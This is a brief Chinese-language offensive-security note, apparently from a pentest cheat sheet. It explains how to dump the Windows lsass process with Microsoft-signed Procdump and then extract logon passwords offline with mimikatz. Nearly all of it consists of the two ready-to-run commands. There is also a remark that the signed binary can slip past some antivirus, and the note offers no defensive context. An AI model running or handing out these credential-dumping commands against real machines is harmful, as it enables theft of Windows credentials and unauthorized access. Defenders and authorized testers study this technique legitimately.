# 微软签名工具读取lsass进程

首先用管理员身份运行[Procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump)转储内存，这个工具是微软签名的合法二进制文件，但遇上其他杀毒软件可能会失效；该方法在Windows篡改防护之前的Windows版本有用

```
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
```

然后讲lsass.dmp复制出来到本机使用mimikatz读取

```
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FmSYLjID7VlMEqdYkt7S0%2F1674996072855.png?alt=media&#x26;token=dba73564-6f05-4f92-8ac8-0ca45e80a079" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1674996072855.png)